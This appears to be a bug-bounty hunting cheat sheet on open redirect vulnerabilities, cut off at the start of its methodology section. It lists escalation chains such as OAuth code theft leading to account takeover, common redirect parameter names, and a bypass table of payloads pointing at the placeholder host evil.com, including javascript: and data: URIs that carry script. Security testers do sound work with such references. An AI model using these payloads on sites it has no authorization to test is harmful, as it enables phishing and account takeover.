hunt-open-redirect

# HUNT-OPEN-REDIRECT — Open Redirect ## Crown Jewel Targets Open redirect alone is Low. Chained to OAuth = Critical (ATO). **Highest-value chains:** - **Open redirect → OAuth auth code theft** — redirect_uri contains open redirect on trusted domain → auth code sent to attacker → ATO - **Open redirect → phishing** — users trust the URL because it starts with target.com - **Open redirect → SSRF escalation** — if redirect followed server-side → SSRF - **Open redirect → session fixation** — force user to login endpoint with pre-set session --- ## Attack Surface Signals ``` ?redirect= ?next= ?url= ?return= ?returnTo= ?continue= ?dest= ?destination= ?go= ?forward= ?location= ?target= ?redir= ?redirect_uri= ?callback= ?checkout_url= ?success_url= ?cancel_url= /logout?returnTo= /login?next= /sso?callback= ``` --- ## Bypass Table | Technique | Payload | |-----------|---------| | Basic | `https://evil.com` | | Protocol relative | `//evil.com` | | Backslash bypass | `/\\evil.com` | | At-sign confusion | `https://target.com@evil.com` | | Double slash | `//evil.com/%2F..` | | URL encoding | `%2Fevil.com` | | Null byte | `evil.com%00target.com` | | Whitespace | `evil.com%09` or `%20` | | JavaScript URI | `javascript:window.location='https://evil.com'` | | Data URI | `data:text/html,<script>window.location='https://evil.com'</script>` | | Subdomain | `https://target.com.evil.com` | | Fragment | `https://evil.com#.target.com` | --- ## Step-by-Step Hunting Methodology ### Phase 1 ...